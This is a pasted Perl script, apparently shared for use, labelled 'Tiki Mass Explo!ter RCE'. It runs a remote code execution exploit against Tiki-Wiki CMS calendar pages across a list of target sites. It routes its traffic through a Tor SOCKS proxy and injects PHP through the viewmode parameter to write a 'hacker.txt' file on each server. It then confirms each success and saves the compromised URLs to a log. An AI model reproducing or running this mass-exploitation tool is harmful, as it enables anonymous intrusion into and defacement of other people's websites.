SHOW:
|
|
- or go back to the newest paste.
1 | #!/usr/bin/perl | |
2 | # ->Coder By CrashBandicot | |
3 | # | |
4 | # Tiki-Wiki CMS Calendar 14.2, 12.5 LTS, 9.11 LTS, and 6.15 - Remote Code Execution | |
5 | # discovery by Dany Ouellet | |
6 | # ref: https://www.exploit-db.com/exploits/39965/ | |
7 | ||
8 | use LWP::UserAgent; | |
9 | use LWP::Protocol::socks; | |
10 | use HTTP::Request::Common; | |
11 | ||
12 | if ($^O =~ /Win/) { system("cls"); } else { system("clear"); } | |
13 | print " | |
14 | ||
15 | Tiki Mass Explo!ter RCE | |
16 | by CrashBandicot | |
17 | ||
18 | Usage : $0 list.txt | |
19 | ||
20 | \n"; | |
21 | ||
22 | ||
23 | open(tarrget,"<$ARGV[0]") or die "$!"; | |
24 | while(<tarrget>){ | |
25 | chomp($_); | |
26 | $webs = $_; | |
27 | ||
28 | print " [+] Scanning -> $webs"; | |
29 | ||
30 | $payload = '/tiki-calendar.php?viewmode=%27;%20$z=fopen(%22hacker.txt%22,%27w%27);%20fwrite($z,(%22by%20hacker%22));fclose($z);$a=%27'; | |
31 | ||
32 | $ua = LWP::UserAgent->new(); | |
33 | $ua->proxy([qw/ http https /] => 'socks://127.0.0.1:9150'); | |
34 | $ua->timeout(30); | |
35 | $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5"); | |
36 | $fuck = $ua->get($webs.$payload); | |
37 | ||
38 | $def = $webs."/hacker.txt"; | |
39 | ||
40 | $check = $ua->get($def)->content; | |
41 | if($check =~/hacker/) { | |
42 | ||
43 | print "\n\n [+] File Uploaded >> $def\n"; | |
44 | ||
45 | open(save ,">>savetiki.txt"); | |
46 | print save "$def\n"; | |
47 | close save; | |
48 | ||
49 | ||
50 | } else { print "\n [-] File Upload Fail\n"; } | |
51 | ||
52 | ||
53 | } |